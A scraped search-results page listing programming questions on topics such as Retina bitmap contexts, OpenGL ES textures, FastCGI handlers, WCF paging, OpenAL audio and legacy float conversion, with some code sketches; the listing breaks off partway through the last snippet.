Search Results

Search found 9611 results on 385 pages for 'low power'.


  • How to create a CGBitmapContext that works for Retina display without wasting space on regular displays?

    - by ????
    Is it true that if it is in UIKit, including drawRect, the HD aspect of Retina display is automatically handled? So does that mean in drawRect, the current graphics context for a 1024 x 768 view is actually a 2048 x 1536 pixel bitmap context? (Is there a way to print this size out to verify it?) We actually enjoy the luxury of 1 point = 4 pixels automatically handled for us. However, if we use CGBitmapContextCreate, then those will really be pixels, not points? (At least if we provide a data buffer for that bitmap, the size is not for the higher resolution, but for the standard resolution, and even if we pass NULL as the buffer so that CGBitmapContextCreate handles the buffer for us, the size probably is the same as if we pass in a data buffer, and it is just standard resolution, not Retina's resolution.) We can always create 2048 x 1536 for iPad 1 and iPad 2 as well as the New iPad, but it will waste memory and processor and GPU power, as it is only needed for the New iPad. So do we have to use an if () { } else { } to create such a bitmap context, and how do we actually do so? And do all our CGContextMoveToPoint calls have to be adjusted to use x * 2 and y * 2 on a Retina display vs. just x, y on a non-Retina display? That can be quite messy for the code. (Or maybe we can define a local variable scaleFactor and set it to 1 for standard resolution and 2 if it is Retina, so our x and y will always be x * scaleFactor, y * scaleFactor instead of just x and y.) It seems that UIGraphicsBeginImageContextWithOptions can create one for Retina automatically if a scale of 0.0 is passed in, but I don't think it can be used if I need to create the context and keep it (using an ivar or property of the UIViewController to hold it). If I don't release it using UIGraphicsEndImageContext, then it stays in the graphics context stack, so it seems like I have to use CGBitmapContextCreate instead. (Or do we just let it stay at the bottom of the stack and not worry about it?)
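
    A minimal C sketch of the scaleFactor idea discussed above, assuming the scale value is read elsewhere (e.g. from UIScreen's scale property) and passed in; the function name is illustrative, not an existing API:

    #include <CoreGraphics/CoreGraphics.h>

    /* Create a bitmap context sized in points but backed by scale * scale as many
       pixels, pre-scaled so that drawing code can keep using point coordinates.
       'scale' would be 1.0 on standard displays and 2.0 on Retina displays. */
    static CGContextRef CreateScaledBitmapContext(size_t widthInPoints,
                                                  size_t heightInPoints,
                                                  CGFloat scale)
    {
        size_t pixelWidth  = (size_t)(widthInPoints  * scale);
        size_t pixelHeight = (size_t)(heightInPoints * scale);

        CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();
        CGContextRef ctx = CGBitmapContextCreate(NULL,          /* let CG allocate the buffer */
                                                 pixelWidth,
                                                 pixelHeight,
                                                 8,              /* bits per component */
                                                 0,              /* bytes per row: computed automatically */
                                                 colorSpace,
                                                 (CGBitmapInfo)kCGImageAlphaPremultipliedLast);
        CGColorSpaceRelease(colorSpace);
        if (ctx == NULL) return NULL;

        /* Scale the CTM once, so CGContextMoveToPoint etc. keep taking point
           coordinates; no x * 2 / y * 2 sprinkled through the drawing code. */
        CGContextScaleCTM(ctx, scale, scale);
        return ctx;
    }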

    Read the article

  • Overriding Node Paths

    - by fighella
    Can a PAGE override the priority of a NODE? I want to use the power of "Pages" to override my links from the nodes... For example: a node's link is /content/202/hello-world. I want to use my Panels to use the URL to create a "PAGE"... The panels can use the arguments from the URL to create a pretty cool page around the content of a node... So the PAGE path I've made is /content/%argument1/%title... I need the links created to the node from the node itself to go to this panel page and not to the content created by the node on its own... so I make the path alias do the same as the PAGE settings... /content/nid/title... A hand-typed link to this PAGE works fine when I don't have this as the path alias... It does exactly what I need... but as soon as I make this the path alias, it's like it goes to the single NODE before it goes to the PAGE... Anyone have any clues... Is there an order in which Drupal looks for the correct URL? I'm sure I have done this before. JD

    Read the article

  • Drawing only part of a texture OpenGL ES iPhone

    - by Ben Reeves
    Continued on from my previous question: I have a 320*480 RGB565 framebuffer which I wish to draw using OpenGL ES 1.0 on the iPhone. - (void)setupView { glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR); glTexParameteriv(GL_TEXTURE_2D, GL_TEXTURE_CROP_RECT_OES, (int[4]){0, 0, 480, 320}); glEnable(GL_TEXTURE_2D); } // Updates the OpenGL view when the timer fires - (void)drawView { // Make sure that you are drawing to the current context [EAGLContext setCurrentContext:context]; //Get the 320*480 buffer const int8_t * frameBuf = [source getNextBuffer]; //Create enough storage for a 512x512 power of 2 texture int8_t lBuf[2*512*512]; memcpy (lBuf, frameBuf, 320*480*2); //Upload the texture glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, 512, 512, 0, GL_RGB, GL_UNSIGNED_SHORT_5_6_5, lBuf); //Draw it glDrawTexiOES(0, 0, 1, 480, 320); [context presentRenderbuffer:GL_RENDERBUFFER_OES]; } If I produce the original texture in 512*512 the output is cropped incorrectly but other than that looks fine. However, using the required output size of 320*480 everything is distorted and messed up. I'm pretty sure it's the way I'm copying the framebuffer into the new 512*512 buffer. I have tried this routine: int8_t lBuf[512][512][2]; const char * frameDataP = frameData; for (int ii = 0; ii < 480; ++ii) { memcpy(lBuf[ii], frameDataP, 320); frameDataP += 320; } This is better, but the width appears to be stretched and the height is messed up. Any help appreciated.
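
    As a point of comparison, a row-by-row copy generally has to use the source row size in bytes (width * 2 for RGB565) and the destination row stride (512 * 2 bytes), not a bare pixel count. A hedged C sketch, assuming the frame is stored as srcHeight rows of srcWidth RGB565 pixels (whether that is 320x480 or 480x320 depends on how the source buffer is laid out):

    #include <stdint.h>
    #include <string.h>

    /* Copy a srcWidth x srcHeight RGB565 frame into the top-left corner of a
       512 x 512 RGB565 texture buffer. Every pixel is 2 bytes, so both the
       source row length and the destination stride are counted in bytes. */
    static void CopyFrameIntoPow2Texture(const uint8_t *frame,
                                         uint8_t *texture512,
                                         int srcWidth, int srcHeight)
    {
        const size_t srcRowBytes = (size_t)srcWidth * 2;  /* RGB565 = 2 bytes per pixel */
        const size_t dstRowBytes = 512 * 2;               /* stride of the 512-wide texture */

        for (int row = 0; row < srcHeight; ++row) {
            memcpy(texture512 + (size_t)row * dstRowBytes,
                   frame      + (size_t)row * srcRowBytes,
                   srcRowBytes);
        }
    }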

    Read the article

  • android & libgdx - disable blurry images rendering

    - by android developer
    I'm trying out libgdx as an OpenGL wrapper, and I have some issues with its graphical rendering: for some reason, all images (textures) on the Android device look a little blurred using libgdx. This also includes text (fonts). However, for normal images, even though I show the entire image, I expect it to look as sharp as I see it on a computer, especially since I have such a good screen on the device (it's a Galaxy Nexus). I've tried to turn anti-aliasing off, using the following code: final AndroidApplicationConfiguration androidApplicationConfiguration=new AndroidApplicationConfiguration(); androidApplicationConfiguration.numSamples=0; //tried the value of 1 too. ... I've also tried setting the scaling method to various filters, but with no luck. Example: texture.setFilter(TextureFilter.Nearest,TextureFilter.Nearest); As a test, I've found a sharp image that exactly matches the visible resolution on the device (720x1184 for the Galaxy Nexus, because of the buttons bar) and put it as the background of the libgdx app. Of course, I had to add extra blank space in order for the texture to be loaded, so the final size of the image (which includes content and empty space) is still a power of 2 for both width and height (1024x2048 in my case). On the desktop app it looks ok. On the device it looked blurred. A weird thing I've noticed is that when I change the device's orientation (horizontal <-> vertical), for the very short time before the rotation animation starts, I see both the image and the text very well. Can anyone please help me?

    Read the article

  • Fast, very lightweight algorithm for camera motion detection?

    - by Ertebolle
    I'm working on an augmented reality app for iPhone that involves a very processor-intensive object recognition algorithm (pushing the CPU at 100% it can get through maybe 5 frames per second), and in an effort to both save battery power and make the whole thing less "jittery" I'm trying to come up with a way to only run that object recognizer when the user is actually moving the camera around. My first thought was to simply use the iPhone's accelerometers / gyroscope, but in testing I found that very often people would move the iPhone at a consistent enough attitude and velocity that there wouldn't be any way to tell that it was still in motion. So that left the option of analyzing the actual video feed and detecting movement in that. I got OpenCV working and tried running their pyramidal Lucas-Kanade optical flow algorithm, which works well but seems to be almost as processor-intensive as my object recognizer - I can get it to an acceptable framerate if I lower the depth levels / downsample the image / track fewer points, but then accuracy suffers and it starts to miss some large movements and trigger on small hand-shaking-y ones. So my question is, is there another optical flow algorithm that's faster than Lucas-Kanade if I just want to detect the overall magnitude of camera movement? I don't need to track individual objects, I don't even need to know which direction the camera is moving, all I really need is a way to feed something two frames of video and have it tell me how far apart they are.
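
    One lightweight alternative worth sketching is plain frame differencing on a downsampled grayscale copy of each frame; it only yields a global "how much changed" number, which matches the stated requirement. A rough C sketch, assuming the caller supplies two equally sized 8-bit grayscale buffers (downsampling them first, e.g. by averaging blocks, keeps the per-frame cost tiny compared to Lucas-Kanade):

    #include <stddef.h>
    #include <stdint.h>

    /* Mean absolute difference between two 8-bit grayscale frames of the same
       size. Returns a value in [0, 255]; compare it against a tuned threshold
       to decide whether the camera moved enough to re-run the recognizer. */
    static double FrameMotionMetric(const uint8_t *prev,
                                    const uint8_t *curr,
                                    size_t pixelCount)
    {
        uint64_t total = 0;
        for (size_t i = 0; i < pixelCount; ++i) {
            int d = (int)curr[i] - (int)prev[i];
            total += (uint64_t)(d < 0 ? -d : d);
        }
        return (double)total / (double)pixelCount;
    }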

    Read the article

  • Handling XMLHttpRequest to call external application

    - by Ian
    I need a simple way to use XMLHttpRequest as a way for a web client to access applications in an embedded device. I'm getting confused trying to figure out how to make something thin and light that handles the XMLHttpRequests coming to the web server and can translate those to application calls. The situation: The web client using Ajax (ExtJS specifically) needs to send and receive asynchronously to an existing embedded application. This isn't just to have a thick client/thin server, the client needs to run background checking on the application status. The application can expose a socket interface, with a known set of commands, events, and configuration values. Configuration could probably be transmitted as XML since it comes from a SQLite database. In between the client and app is a lighttpd web server running something that somehow handles the translation. This something is the problem. What I think I want: Lighttpd can use FastCGI to route all XMLHttpRequest to an external process. This process will understand HTML/XML, and translate between that and the application's language. It will have custom logic to simulate pushing notifications to the client (receive XMLHttpRequest, don't respond until the next notification is available). C/C++. I'd really like to avoid installing Java/PHP/Perl on an embedded device. So I'll need more low level understanding. How do I do this? Are there good C++ libraries for interpreting the CGI headers and HTML so that I don't have to do any syntax processing, I can just deal with the request/response contents? Are there any good references to exactly what goes on, server side, when handling the XMLHttpRequest and CGI interfaces? Is there any package that does most of this job already, or will I have to build the non-HTTP/CGI stuff from scratch? Thanks for any help! I am really having trouble learning about the server side of these technologies.
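
    One commonly used option for the "something" in the middle is the C FastCGI development kit (libfcgi). A minimal sketch of a responder loop, assuming lighttpd is configured to route the Ajax URL to this process; the XML emitted here is purely illustrative, and the translation to the application's socket protocol would go where the comment indicates:

    #include "fcgi_stdio.h"   /* FastCGI development kit (libfcgi) */
    #include <stdlib.h>

    int main(void)
    {
        /* lighttpd hands each matching request to this process over FastCGI. */
        while (FCGI_Accept() >= 0) {
            const char *method = getenv("REQUEST_METHOD");
            const char *query  = getenv("QUERY_STRING");

            /* Here: parse the query string / request body, forward a command over
               the application's socket interface, wait for the reply (or for the
               next notification, in the long-poll case), then emit the result. */

            printf("Content-Type: text/xml\r\n\r\n");
            printf("<response method=\"%s\" query=\"%s\"/>\n",
                   method ? method : "", query ? query : "");
        }
        return EXIT_SUCCESS;
    }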

    Read the article

  • How to generate random numbers of lognormal distribution within specific range in Matlab

    - by Harpreet
    My grain sizes are defined as D=[1.19,1.00,0.84,0.71,0.59,0.50,0.42]. The problem is described below in steps. Grain sizes should follow a lognormal distribution. The mean of the grain sizes is fixed at 0.84 and the standard deviation should be as low as possible but not zero. 90% of the grains (by weight %) fall in the size range of 1.19 to 0.59, and the remaining 10% fall in the size range of 0.50 to 0.42. Now I want to find the probabilities (weight percentages) of the grains falling in each grain size. It is allowable to split this grain size distribution into further smaller sizes, but it must always stay in the range of 1.19 to 0.42, i.e. 'D' can be continuous but 0.42 < D < 1.19. I need it fast. I tried on my own but I am not able to get the correct result. I am getting negative probabilities (weight percentages). Thanks to anyone who helps. I didn't incorporate point 3 as I came to know about that condition later. Here are the simple steps I tried: %% D=[1.19,1.00,0.84,0.71,0.59,0.50,0.42]; s=0.30; % std dev of the lognormal distribution m=0.84; % mean of the lognormal distribution mu=log(m^2/sqrt(s^2+m^2)); % mean of the associated normal dist. sigma=sqrt(log((s^2/m^2)+1)); % std dev of the associated normal dist. [r,c]=size(D); for i=1:c D(i)=mu+(sigma.*randn(1)); w(i)=(log(D(i))-mu)/sigma; % the probability or the wt. percentage of the grain sizes end grain_size=exp(D); %%
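
    For the weight fractions themselves, working from the lognormal CDF avoids sampling noise and negative values entirely. With mu and sigma as computed in the script and Phi the standard normal CDF, the weight falling between two sizes a and b is (in LaTeX notation):

    P(a < D \le b) = \Phi\!\left(\frac{\ln b - \mu}{\sigma}\right) - \Phi\!\left(\frac{\ln a - \mu}{\sigma}\right),
    \qquad
    \mu = \ln\!\frac{m^{2}}{\sqrt{s^{2}+m^{2}}}, \qquad
    \sigma = \sqrt{\ln\!\left(1 + \frac{s^{2}}{m^{2}}\right)}

    Evaluating this for each adjacent pair of grain sizes, and dividing by the probability of the whole allowed 0.42-1.19 range, is one way to obtain non-negative weights that sum to one.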

    Read the article

  • iPhone OS: Why is my managedModelObject not complying with Key Value Coding?

    - by nickthedude
    Ok so I'm trying to build this stat tracker for my app and I have built a data model object called statTracker that keeps track of all the stuff I want it to. I can set and retrieve values using the selectors, but if I try and use KVC (ie setValue: forKey: ) everything goes bad and says my StatTracker class is not KVC compliant: valueForUndefinedKey:]: the entity StatTracker is not key value coding-compliant for the key "timesLauched".' 2010-05-18 15:55:08.573 here's the code that is triggering it: NSArray *statTrackerArray = [[NSArray alloc] init]; statTrackerArray = [[CoreDataSingleton sharedCoreDataSingleton] getStatTracker]; NSNumber *number1 = [[NSNumber alloc] init]; number1 = [NSNumber numberWithInt:(1 + [[(StatTracker *)[statTrackerArray objectAtIndex:0] valueForKey:@"timesLauched"] intValue])]; [(StatTracker *)[statTrackerArray objectAtIndex:0] setValue:number1 forKey:@"timesLaunched" ]; NSError *error; if (![[[CoreDataSingleton sharedCoreDataSingleton] managedObjectContext] save:&error]) { NSLog(@"error writing to db"); } Not sure if this is enough code for you folks let me know what you need if you do need more. This would be so sweet if I could use KVC because I could then abstract all this stat tracking stuff into a single method call with a string argument for the value in question. At least that is what I hope to accomplish here. I'm actually now understanding the power of KVC but now I'm just trying to figure out how to make it work. Thanks! Nick

    Read the article

  • DVCS with a Windows central repository

    - by Mikko Rantanen
    We are currently using VSS for version control. Quite a few of our developers are interested in a distributed model (and want to get rid of VSS). Our network is full of Windows machines, and while our IT department has experience maintaining Linux machines they would prefer not to. What DVCS systems can host their central repository on Windows while providing: Push access to the repository. Basic authentication. Mostly just a way to allow or deny access to the whole repository. No need for fine-grained access. A server process so users don't need write rights to the repository, reducing the risk of accidentally messing with it. On the client side, a GUI such as Tortoise would be more or less a requirement (Sorry, Windows shell sucks. :|). Ease of installation would be a huge plus as our IT department is already quite low on resources. And using Windows credentials for authentication would be an advantage but not a requirement as long as the client is able to store the credentials. I have had a (really) quick look at Git, Mercurial and Bazaar. Git seemed to use ssh or simple WebDAV for repository access, requiring write permission for the users. Mercurial had a built-in HTTP server, but this seemed to be only for pull purposes. Update: Mercurial supports push as well. Bazaar seemed to use sftp for repository access, again requiring write permission for the users. Are there Windows server processes for any DVCS systems, and has anyone managed to set one up in Windows land? And apologies if this is a duplicate question. I couldn't find one. Update: Got Mercurial working for push purposes! A detailed list of what was required can be found as an answer below.

    Read the article

  • Payment Processors - What do I need to know if I want to accept credit cards on my website?

    - by Michael Pryor
    This question talks about different payment processors and what they cost, but I'm looking for the answer to what do I need to do if I want to accept credit card payments? Assume I need to store credit card numbers for customers, so that the obvious solution of relying on the credit card processor to do the heavy lifting is not available. PCI Data Security, which is apparently the standard for storing credit card info, has a bunch of general requirements, but how does one implement them? And what about the vendors, like Visa, who have their own best practices? Do I need to have keyfob access to the machine? What about physically protecting it from hackers in the building? Or even what if someone got their hands on the backup files with the sql server data files on it? What about backups? Are there other physical copies of that data around? Tip: If you get a merchant account, you should negotiate that they charge you "interchange-plus" instead of tiered pricing. With tiered pricing, they will charge you different rates based on what type of Visa/MC is used -- ie. they charge you more for cards with big rewards attached to them. Interchange plus billing means you only pay the processor what Visa/MC charges them, plus a flat fee. (Amex and Discover charge their own rates directly to merchants, so this doesn't apply to those cards. You'll find Amex rates to be in the 3% range and Discover could be as low as 1%. Visa/MC is in the 2% range). This service is supposed to do the negotiation for you (I haven't used it, this is not an ad, and I'm not affiliated with the website, but this service is greatly needed.) This blog post gives a complete rundown of handling credit cards (specifically for the UK).

    Read the article

  • Splitting the build across the network?

    - by Dandikas
    Is there a known solution for splitting the build process across networked machines? Use case: We are an average software development company. We own around 50 development workstations (quad core 2.66 GHz, 4 GB RAM, 200 GB RAID). Needless to say, at any single moment not every machine is loaded to the max. There are 5 to 15 projects running simultaneously at any single moment. Obviously all of them are continuously built on a server, then deployed to the proper environment. A single project build takes from 3 to 15 minutes. The problem: Whenever we build 5 projects in a row, the last project is going to be ready after around 25 - 50 minutes. Building in parallel does not solve the problem (the build is only a part of the game, then you need to deploy, run tests, etc.) YES, the correct solution is to add another build server, but "That involves buying new Expensive hardware, and we already spent a lot!". Yea, right (damn them)! Anyway. What about splitting the build among developer workstations? Let's say whenever we need to build project "A" we check 5 workstations and start builds on all that are not overloaded. The build can be canceled by a developer if he really needs all the power of his machine, as long as there is at least 1 machine that is still building. After the build is finished, deployment can be performed to a proper environment (hosted on some server, not on a workstation :) ). The bigger the company, the more this makes sense to me. Anyone tried something like this? Are there any good practices? Any helpful software? (90% of the projects are .NET C#)

    Read the article

  • Simplest way to debug an android bluetooth application

    - by intiha
    I am trying to test and build a sample Android application that can simply connect to a BT server to send and receive a few packets. Since the emulator has no support, what is the next best thing to test BT communication? Can I just run code that acts as a server on my laptop and dumps the BT connection onto a console? Do I have to write this code, or is there a simple tool that saves me that hassle? One more thing: I have Windows 7, and currently I attach an Anycom USB BT adapter to my PC. This is able to see my Nexus One as a BT device. I can pair with my laptop but the connection always fails. When it tries to pair, I have tried both 0000 and 1234 as suggested on my Nexus, but in my connection list it still lists my laptop as paired but not connected. Any idea why? I searched for this problem and apparently people talk about rebooting and power cycling BT, but these solutions don't work for me. Thanks. Affan.

    Read the article

  • Problem with load testing Web Service - VSTS 2008

    - by Carlos
    Hello, I have a web test which makes a simple call to a web service and looks like this: MyWebService webService = new MyWebService(); webService.Timeout = 180000; webService.myMethod(); I am not using ThinkTimes, and the Run Duration is set to 5 minutes. When I ran this test simulating only 1 user, I checked the counters and found something like this: Tests Total: 4500 Network Interface\Bytes sent (agent machine): 35,500 Then I ran the same tests, but this time simulating 2 users, and I got something like this: Tests Total: 2225 Network Interface\Bytes sent (agent machine): 30,500 So when I increased the number of users, the tests/sec was half of what it was with only 1 user, and the bytes sent by the agent were also lower. I think it is strange, because it doesn't seem I have a bottleneck on my agent machine, since CPU is never higher than 30% and I have over 1.5GB of RAM free; also my network utilization is like 0.5% of its capacity. In order to troubleshoot this I ran a test using a Step Pattern, with the simulated users going from 20 to 800. When I check the requests/sec, it is practically constant through the whole test, so it is clear there is something in my test or my environment which is preventing the number of requests from getting higher. It would be expected behavior if the "response time" was getting higher, because it would tell me the requests weren't being processed properly, but the strange thing is the response time is practically constant all the time and it is pretty low actually. I have no idea why my agent can't send more requests when I increase the number of users; any help/tip/guess would be really appreciated.

    Read the article

  • Can iPad/iPhone Touch Points be Wrong Due to Calibration?

    - by Kristopher Johnson
    I have an iPad application that uses the whole screen (that is, UIStatusBarHidden is set true in the Info.plist file). The main window's frame is set to (0, 0, 768, 1024), as is the main view in that frame. The main view has multitouch enabled. The view has code to handle touches: - (void)touchesMoved:(NSSet *)touches withEvent:(UIEvent *)event { for (UITouch *touch in touches) { CGPoint location = [touch locationInView:nil]; NSLog(@"touchesMoved at location %@", NSStringFromCGPoint(location)); } } When I run the app in the simulator, it works pretty much as expected. As I move the mouse from one edge of the screen to the other, reported X values go from 0 to 767. Reported Y values go from 20 to 1023, but it is a known issue that the simulator doesn't report touches in the top 20 pixels of the screen, even when there is no status bar. Here's what's weird: When I run the app on an actual iPad, the X values go from 0 to 767 as expected, but reported Y values go from -6 to 1017. The fact that it seems to work properly on the simulator leads me to suspect that real devices' touchscreens are not perfectly calibrated, and mine is simply reporting values six pixels too low. Can anyone verify that this is the case? Otherwise, is there anything else that could account for the Y values being six pixels off from what I expect? (In a few days, I should have a second iPad, so I can test this with another device and compare the results.)

    Read the article

  • working with large sprite sheets on iphone

    - by lukya
    Hi All, I am trying to use sprite sheet animation in my application. The first POC with a small sprite sheet worked fine, but as I change the sprite sheet to a bigger one, I get a "check_safe_call: could not restore current frame" warning and the application quits. A quick search revealed that this problem means my app is taking too much memory or the image dimensions are too large. My image is 4.9 MB and its dimensions are 6720 * 10080 (oops!!). I read that the iPhone allows a maximum 3 MB image with dimensions up to 1024 * 1024, and also that the sprite sheet image dimensions should be a power of two. So please let me know how I can use a sprite sheet this big. One approach could be to cut the sprite sheet into many smaller sprite sheets and use them one at a time. Please suggest if you know any other/better approach to accommodate bigger sprite sheets, and whether the problem with my sprite sheet is size (4.9 MB) OR dimensions (6720 * 10080). (Just FYI, I am not trying to play a movie, so using an MP4 file instead is not an option for me. I need to animate the sprite sheet based on accelerometer input, and I have been able to achieve that in my POC with the smaller sprite sheet.) Thanks, Swapnil
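
    A small C sketch of the bookkeeping needed for the "cut it into smaller sheets" approach: given a global frame index, work out which sub-sheet holds it and where. The frame size and grid layout parameters here are illustrative assumptions, not values from the question:

    #include <stdint.h>

    /* Illustrative layout: each sub-sheet (e.g. 1024 x 1024) holds a grid of
       framesPerRow x framesPerCol frames of frameWidth x frameHeight pixels. */
    typedef struct {
        int sheetIndex;   /* which sub-sheet texture to bind        */
        int x, y;         /* top-left pixel of the frame inside it  */
    } FrameLocation;

    static FrameLocation LocateFrame(int frameIndex,
                                     int frameWidth, int frameHeight,
                                     int framesPerRow, int framesPerCol)
    {
        int framesPerSheet = framesPerRow * framesPerCol;
        int within = frameIndex % framesPerSheet;

        FrameLocation loc;
        loc.sheetIndex = frameIndex / framesPerSheet;
        loc.x = (within % framesPerRow) * frameWidth;
        loc.y = (within / framesPerRow) * frameHeight;
        return loc;
    }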

    Read the article

  • Load Spikes on an Apache MySQL Server with Wordpress MU

    - by Vikram Goyal
    Hi there, I am trying to investigate the reasons for some mysterious load spikes on a Linux Apache server (2.2.14) running PHP 5.2.9 on a dedicated server with enough processing power and memory. My primary web application is a Wordpress MU (2.9.2) installation. I have investigated and ruled out DOS attack, MySQL or Apache configuration issues. The log files don't give me anything of interest, except to tell me that there is severe load. The load (which can go up to 100) just seems to come and go. It helps that I have a script that checks every 3 minutes for the load, and restarts Apache. Restarting it helps, and the server comes back, till it happens again. There seems to be no set time frame, or visitor numbers on the site that can trigger this. Even a low number of concurrent visitors (20) can trigger it. I am almost convinced that there is a rewrite loop somewhere that is causing Apache to go mad. Apache is trying to serve something that is causing it to spawn more and more processes till it keels over. My question is: Given that I am convinced that this is a rewrite issue or something similar, how can I try and figure out what the issue is? What should I monitor? Apache logs are voluminous, and not very helpful. Of course, if this is not the issue, then at least knowing what to look for will help me eliminate this as an issue and look for something else. Thanks! Vikram

    Read the article

  • Returning large collections from WCF Service

    - by Nate Bross
    I'm trying to determine the best approach for building a WCF Service, and the area I'm struggling with most is returning lists of objects. The built-in maxMessageSize of 64k seems pretty high, and I really don't want to bump it up (quick googling finds 100s of places bumping the maxMessageSize up to the multi-gigabyte range, which seems foolish). But when I'm returning a collection of objects (~150 items) I am exceeding the default 64k. I'm almost to the point of returning my own class which inherits IEnumerable and has properties for hasNext, hasPrevious and PageSize so that I can implement paging on the client side -- this seems like a lot of code. The other option is to jack up the maxMessageSize and hope for the best, but that feels wrong. All other aspects of my service are working great; it's just returning large collections where I'm having issues. For background, there are two types of consumers of this service: UI applications, which will be primarily web and/or WPF applications, and data processing applications, .NET console apps, and maybe some other non-UI apps. For the UI applications, I would like to keep them responsive and keep the messageSize low; for the console apps it doesn't matter as much, as they are just pulling data down to do processing and pushing it back up to the service.

    Read the article

  • Cross-Platform Language + GUI Toolkit for Prototyping Multimedia Applications

    - by msutherl
    I'm looking for a language + GUI toolkit for rapidly prototyping utility applications for multimedia installations. I've been working with Max/MSP/Jitter for many years, but I'd like to add a text-based language to my 'arsenal' for tasks apart from 'content production'. (When it comes to actual media synthesis, my choices are clear [SuperCollider + MSP for audio, Jitter + Quartz + openFrameworks for video]). I'm looking for something that maintains some of the advantages of Max, but is lower-level, faster, more cross-platform (Linux support), and text-based. Integration with powerful sound/video libraries is not a requirement. Some requirements: Cross-platform (at least OSX and Linux, Windows is a plus) Fast and easy cross-platform GUIs with no platform-specific modification GUI code separated from backend code as much as possible Good for interfacing with external serial devices (micro-controllers) Good network support (UDP/TCP) Good libraries for multi-media (video, sound, OSC) are a plus Asynchronous/synchronous UNIX integration is a plus The options that come to mind: AS3/Flex (not a fan of AS3 or the idea of running in the Flash Player) openFrameworks (C++ framework, perhaps a bit too low level [looking for fast development time] and biased toward video work) Java w/ Processing libraries (like openFrameworks, just slower) Python + Qt (is Qt appropriate for rapid prototyping?) Python + Another GUI toolkit SuperCollider + Swing (yucky GUI development) Java w/ SWT Any other options? What do you recommend?

    Read the article

  • What do you use to play sound in iPhone games?

    - by zoul
    Hello! I have a performance-intensive iPhone game I would like to add sounds to. There seem to be about three main choices: (1) AVAudioPlayer, (2) Audio Queues and (3) OpenAL. I’d hate to write pages of low-level code just to play a sample, so I would like to use AVAudioPlayer. The problem is that it seems to kill the performance – I’ve done a simple measurement using CFAbsoluteTimeGetCurrent and the play message seems to take somewhere from 9 to 30 ms to finish. That’s quite miserable, considering that 25 ms == 40 fps. Of course there is the prepareToPlay method that should speed things up. That’s why I wrote a simple class that keeps several AVAudioPlayers at its disposal, prepares them beforehand and then plays the sample using the prepared player. No cigar, it still takes the ~20 ms I mentioned above. Such performance is unusable for games, so what do you use to play sounds with decent performance on iPhone? Am I doing something wrong with the AVAudioPlayer? Do you play sounds with Audio Queues? (I’ve written something akin to AVAudioPlayer before 2.2 came out and I would love to be spared that experience.) Do you use OpenAL? If yes, is there a simple way to play sounds with OpenAL, or do you have to write pages of code? Update: Yes, playing sounds with OpenAL is fairly simple.
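
    To gauge how much code OpenAL actually needs per sample, here is a rough C sketch of the play path only, assuming the device and context were opened once at startup (alcOpenDevice/alcCreateContext) and the PCM data is already decoded in memory:

    #include <OpenAL/al.h>

    /* Upload one decoded 16-bit mono PCM clip and start playing it.
       Returns the source ID so the caller can reuse or delete it later. */
    static ALuint PlayPCM(const void *pcmData, ALsizei numBytes, ALsizei sampleRate)
    {
        ALuint buffer = 0, source = 0;

        alGenBuffers(1, &buffer);
        alBufferData(buffer, AL_FORMAT_MONO16, pcmData, numBytes, sampleRate);

        alGenSources(1, &source);
        alSourcei(source, AL_BUFFER, (ALint)buffer);
        alSourcePlay(source);

        return source;   /* eventually clean up with alDeleteSources / alDeleteBuffers */
    }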

    Read the article

  • Hibernate JDBCConnectionException: Communications link failure and java.io.EOFException: Can not read response from server

    - by Marc
    I get a quite well-known error using the MySQL JDBC driver: JDBCConnectionException: Communications link failure, java.io.EOFException: Can not read response from server. This is caused by the wait_timeout parameter in my.cnf. So I decided to use a c3p0 connection pool along with Hibernate. Here is what I added to hibernate.cfg.xml: <property name="hibernate.connection.provider_class">org.hibernate.connection.C3P0ConnectionProvider</property> <property name="c3p0.min_size">10</property> <property name="c3p0.max_size">100</property> <property name="c3p0.timeout">1000</property> <property name="c3p0.preferredTestQuery">SELECT 1</property> <property name="c3p0.acquire_increment">1</property> <property name="c3p0.idle_test_period">2</property> <property name="c3p0.max_statements">50</property> idle_test_period is deliberately low for test purposes. Looking at the MySQL logs I can see the "SELECT 1" request being sent regularly to the MySQL server, so it works. Unfortunately I still get this EOF exception within my app if I wait longer than 'wait_timeout' seconds (set to 10 for test purposes). I'm using Hibernate 4.1.1 and mysql-jdbc-connector 5.1.18. So what am I doing wrong? Thanks, Marc.

    Read the article

  • How do I detect if both left and right buttons are pushed?

    - by Greg McGuffey
    I would like to have three mouse actions over a control: left, right and BOTH. I've got the left and right and am currently using the middle button for the third, but am curious how I could use the left and right buttons being pressed together, for those situations where the user has a mouse without a middle button. This would be handled in the OnMouseDown method of a custom control. UPDATE After reviewing the suggested answers, I need to clarify that what I was attempting to do was to take action on the mouse click in the MouseDown event (actually the OnMouseDown method of a control). Because it appears that .NET will always raise two MouseDown events when both the left and right buttons on the mouse are clicked (one for each button), I'm guessing the only way to do this would be either to do some low-level Windows message management or to implement some sort of delayed execution of an action after MouseDown. In the end, it is just way simpler to use the middle mouse button. Now, if the action took place on MouseUp, then Gary's or nos's suggestions would work well. Any further insights on this problem would be appreciated. Thanks!

    Read the article

  • Convert pre-IEEE-754 C++ floating-point numbers to/from C#

    - by Richard Kucia
    Before .NET, before math coprocessors, before IEEE-754, Microsoft defined a bit pattern for floating-point numbers. Old versions of the C++ compiler happily used that definition. I am writing a C# app that needs to read/write such floating-point numbers in a file. How can I do the conversions between the 2 bit formats? I need conversion methods in both directions. This app is going to run in a PocketPC/WinCE environment. Changing the structure of the file is out of scope for this project. Is there a C++ compiler option that instructs it to use the old FP format? That would be ideal. I could then exchange data between the C# code and C++ code by using a null-terminated text string, and the C++ methods would be simple wrappers around the sprintf and atof functions. At the very least, I'm hoping someone can reply with the bit definitions for the old FP format, so I can put together a low-level bit manipulation algorithm if necessary. Thanks.
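
    The old format being described is most likely the Microsoft Binary Format (MBF). For the single-precision case, the four bytes hold, from low to high: 23 mantissa bits, a sign bit, and an 8-bit exponent, with the value read as 0.1mantissa * 2^(exponent - 128). A hedged C sketch of one direction of the conversion; exponent underflow/overflow and rounding are ignored, so treat it as a starting point rather than a drop-in routine:

    #include <stdint.h>
    #include <string.h>

    /* Convert a 4-byte MBF single (its bytes packed little-endian into a
       uint32_t) to an IEEE 754 float. An MBF exponent byte of 0 means zero. */
    static float MbfToIeeeSingle(uint32_t mbfBits)
    {
        uint32_t mbfExp   = (mbfBits >> 24) & 0xFFu;      /* high byte           */
        uint32_t sign     = (mbfBits >> 23) & 0x1u;       /* bit 7 of third byte */
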